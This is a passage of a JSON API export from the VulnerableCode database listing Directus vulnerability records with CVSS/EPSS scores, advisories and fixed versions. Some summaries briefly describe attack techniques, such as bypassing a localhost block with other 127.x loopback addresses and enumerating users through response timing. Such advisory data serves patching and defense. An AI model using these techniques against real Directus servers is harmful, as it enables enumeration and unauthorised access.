"vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2" } ], "aliases": [ "CVE-2024-36128", "GHSA-632p-p495-25m5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qeh1-cm33-93g1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90513?format=api", "vulnerability_id": "VCID-qfnx-egwg-ybgp", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. A vulnerability in versions prior to 11.13.0 allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. 
Version 11.13.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64748", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15913", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15946", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15936", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.158", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64748" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204", "reference_id": "7737d56e096f95edfbdf861a3c08999ad31ce204", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/" } ], "url": "https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64748", "reference_id": "CVE-2025-64748", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": 
"MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64748" }, { "reference_url": "https://github.com/advisories/GHSA-8jpw-gpr4-8cmh", "reference_id": "GHSA-8jpw-gpr4-8cmh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8jpw-gpr4-8cmh" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh", "reference_id": "GHSA-8jpw-gpr4-8cmh", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ "CVE-2025-64748", 
"GHSA-8jpw-gpr4-8cmh" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qfnx-egwg-ybgp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37995?format=api", "vulnerability_id": "VCID-qrf3-cz1h-8kau", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. When relying on blocking access to localhost using the default `0.0.0.0` filter a user may bypass this block by using other registered loopback devices (like `127.0.0.2` - `127.127.127.127`). This issue has been addressed in release versions 10.13.3 and 11.1.0. Users are advised to upgrade. Users unable to upgrade may block this bypass by manually adding the `127.0.0.0/8` CIDR range which will block access to any `127.X.X.X` ip instead of just `127.0.0.1`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46990", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47191", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47188", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47206", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47051", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46990" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", 
"scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_id": "4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b" }, { "reference_url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52", "reference_id": "769fa22797bff5a9231599883b391e013f122e52", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52" }, { "reference_url": "https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff", "reference_id": 
"8cbf943b65fd4a763d09a5fdbba8996b1e7797ff", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff" }, { "reference_url": "https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431", "reference_id": "c1f3ccc681595038d094ce110ddeee38cb38f431", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46990", "reference_id": "CVE-2024-46990", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": 
"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46990" }, { "reference_url": "https://github.com/advisories/GHSA-68g8-c275-xf2m", "reference_id": "GHSA-68g8-c275-xf2m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-68g8-c275-xf2m" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m", "reference_id": "GHSA-68g8-c275-xf2m", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33327?format=api", "purl": "pkg:npm/directus@10.13.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/33328?format=api", "purl": "pkg:npm/directus@11.0.0-rc.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": 
"VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/33329?format=api", "purl": "pkg:npm/directus@11.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-3vnr-k31f-vycv" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" 
}, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-ghbw-eqaz-jqhs" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0" } ], "aliases": [ "CVE-2024-46990", "GHSA-68g8-c275-xf2m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qrf3-cz1h-8kau" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70838?format=api", "vulnerability_id": "VCID-rdpb-7dcd-fyby", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Before 11.14.1, a timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. 
This vulnerability is fixed in 11.14.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26185", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02541", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02551", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02548", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03331", "published_at": "2026-06-14T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26185" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/pull/26485", "reference_id": "26485", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/pull/26485" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26185", "reference_id": "CVE-2026-26185", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2026-26185" }, { "reference_url": "https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a", "reference_id": "e69aa7a5248c6e3e822cb1ac354dee295df90b2a", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a" }, { "reference_url": "https://github.com/advisories/GHSA-jr94-gj3h-c8rf", "reference_id": "GHSA-jr94-gj3h-c8rf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jr94-gj3h-c8rf" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf", "reference_id": "GHSA-jr94-gj3h-c8rf", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.14.1", "reference_id": "v11.14.1", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, 
{ "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.14.1" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39145?format=api", "purl": "pkg:npm/directus@11.14.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.1" } ], "aliases": [ "CVE-2026-26185", "GHSA-jr94-gj3h-c8rf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rdpb-7dcd-fyby" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105820?format=api", "vulnerability_id": "VCID-rren-vtar-23fm", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, the exact Directus version number is incorrectly being used as OpenAPI Spec version this means that it is being exposed by the `/server/specs/oas` endpoint without authentication. With the exact version information a malicious attacker can look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. 
Version 11.9.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53887", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55091", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55216", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55212", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55228", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53887" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53887", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53887" }, { "reference_url": "https://github.com/directus/directus/pull/25353", "reference_id": "25353", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": 
"https://github.com/directus/directus/pull/25353" }, { "reference_url": "https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3", "reference_id": "e74f3e4e92edc33b5f83eefb001a3d2a85af17a3", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": "https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3" }, { "reference_url": "https://github.com/advisories/GHSA-rmjh-cf9q-pv7q", "reference_id": "GHSA-rmjh-cf9q-pv7q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rmjh-cf9q-pv7q" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q", "reference_id": "GHSA-rmjh-cf9q-pv7q", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { 
